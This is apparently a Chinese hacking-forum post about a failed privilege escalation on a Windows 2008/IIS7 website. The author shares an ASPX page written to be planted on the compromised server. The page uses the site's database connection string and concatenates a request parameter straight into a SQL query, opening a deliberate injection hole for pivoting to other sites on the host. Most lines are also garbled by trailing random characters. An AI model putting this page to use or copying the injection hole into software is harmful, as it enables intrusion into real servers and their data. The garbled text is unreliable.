昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。# Q8 @7 l3 R$ m/ I+ ]- t' d
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。4 t, E) z. p" r0 d X$ }$ {
代码量不多,自己写个拉倒了。烦死了。. U& I: N/ Q( u7 S+ J% J+ w
4 a& ^! E. h+ m% T/ A/ O/ M
s/ J8 x7 A- q2 n+ w- m
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">1 N: d4 i' J6 t. X9 w
<html xmlns="http://www.w3.org/1999/xhtml">, g2 x8 O8 V3 P0 Q9 P& t
<head runat="server">$ |8 W4 b' c& ^! c# i& M: D
<title>暗影aspx构造注射专用页面</title>3 D+ [- L2 n: ]* c* F$ C( I8 K
</head>
$ {! n: \. d. Z- {1 s4 Q<body>
/ k- w: W: C& }' e( q3 U <form id="form1" runat="server">
7 Q) q. O( R6 c& @, b <div>2 a& x. ~& X" [1 |: G" Q( C; m# s
<script language="c#" runat="server">
4 }2 i+ z; g* B3 ^4 ? : x$ w# q' P9 S; {8 g
void page_init(object sender, EventArgs e)
0 ]" v) ?: M: t+ Z" J {& t2 F% E. n$ c! @0 @, {% Q
- u+ K! s2 I7 w; ~6 n0 n" X1 u. ? System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();7 Z R- X/ ]4 Z& N
1 O. X3 k* M( ^$ P& B8 [ conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
. n& X' M! G. r* q conn.Open();
" U+ ]' U2 E8 K 3 `2 {+ {7 ~5 |+ i
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
+ T: d4 ?" [; t7 G5 Z
! H6 a z0 W$ R! @7 a& `1 g9 t System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);7 C2 m% f0 S4 f
int x = command.ExecuteNonQuery();
3 t# {+ S; |+ F1 X. m" q* w: w Response.Write(i+"\n");, H, n8 q* i( u$ P2 V$ c- _8 F/ x
Response.Write(x);: t, h( R2 K4 k0 Z1 H* X$ z
conn.Close();% a5 C! v1 B! g; x# s
}
8 b0 v% `3 ~- h* k( Z1 a1 A
& q' x8 D, [: n* h5 g& Y </script>
7 l. |" n8 W. O+ |+ f; ?- h </div>
) j2 F6 H. J: y% b' i4 a. e </form>
( M1 E3 S1 E' ]% y</body>" o$ g$ \- s: B$ A6 A, [$ H/ d& a
</html>) _* t1 K5 q0 }8 D
|